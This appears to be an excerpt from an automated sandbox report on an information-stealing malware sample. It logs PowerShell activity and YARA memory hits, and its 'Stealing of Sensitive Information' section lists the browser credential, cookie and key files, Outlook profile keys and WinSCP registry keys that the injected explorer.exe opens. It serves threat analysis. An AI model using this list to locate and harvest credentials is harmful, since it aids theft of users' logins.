                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\djvbaaeQueries volume information: C:\Users\user\AppData\Roaming\djvbaae VolumeInformation
                Source: C:\Users\user\AppData\Roaming\djvbaaeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D62112 GetSystemTimeAsFileTime,_alldiv,wsprintfA,17_2_02D62112
                Source: C:\Windows\explorer.exeCode function: 14_2_03443490 GetUserNameW,14_2_03443490
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02D62198 RtlZeroMemory,GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlCompareMemory,RtlCompareMemory,StrStrIW,FreeLibrary,17_2_02D62198
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\data.safe.bin
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829702.cde8135c-88c3-4c34-8670-7ef017742548.new-profile.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\background-update
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834620.c7889da7-33f0-4599-8452-58d47c58437b.main.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829744.7278f154-e8f4-4235-84c5-c5c1c6af0084.main.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1435a377-bbaf-4c9c-8706-0811a779fa3f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\.metadata-v2
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\808127e8-e7ed-4078-b3f3-7f09061a011f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\times.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.81ddb4cc-1d49-45f2-961f-e24ea6db2be5.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\Telemetry.FailedProfileLocks.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\12f997af-c065-4562-b9f6-11000bb95c9b
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\xulstore.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834580.6fc53411-ad83-4cf6-a5f6-905f0f3f52e8.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\1d5599c8-3f43-42cc-8163-9a43c60a06d1
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\compatibility.ini
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\pkcs11.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\78267ebf-1fb3-4b11-82e9-903e54a2a54e
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addonStartup.json.lz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\times.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829746.67aa4432-87f8-463e-b422-f6679add9971.first-shutdown.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\6fc53411-ad83-4cf6-a5f6-905f0f3f52e8
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\7278f154-e8f4-4235-84c5-c5c1c6af0084
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\ExperimentStoreData.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\45e26519-596d-41a5-b290-e547b44111fd
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a5d6ec76-765c-4778-afd2-1e05a1554d8e
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\handlers.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\7d12ac42-15c3-4db9-abfe-259bc8d249ac
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\15f01145-7764-450b-9ad5-323693350a9c
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\shield-preference-experiments.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\previous.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\addons.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857833.45e26519-596d-41a5-b290-e547b44111fd.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857860.a73949a2-5a70-4025-8008-88156c16bb4a.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\state.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\a7174184-f177-48c4-876a-8a51c2ed8fbc
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333829737.9f7a5e7a-2be0-4ff7-b132-b1f6e59a8e58.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834608.65054280-9d54-477d-a3ea-afcb1f88e001.health.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\events
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\containers.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\session-state.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\05d02ac8-b2f1-4670-8541-db8ec2bbf427
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333857869.95af30ae-acac-4802-b983-233d7fd3cf34.main.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\extension-preferences.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\AlternateServices.txt
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\3a40aaf9-3f8b-43a2-85e8-88e3ffc7666f
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\SiteSecurityServiceState.txt
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\parent.lock
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\targeting.snapshot.json
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\search.json.mozlz4
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\pending_pings\277ffbb3-8e94-4f3f-acac-7a401d130160
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\1696333834606.011115ff-9301-40fc-805e-ba07b7fdfce4.event.jsonlz4
                Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 692, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5432, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3010408445.0000000003441000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
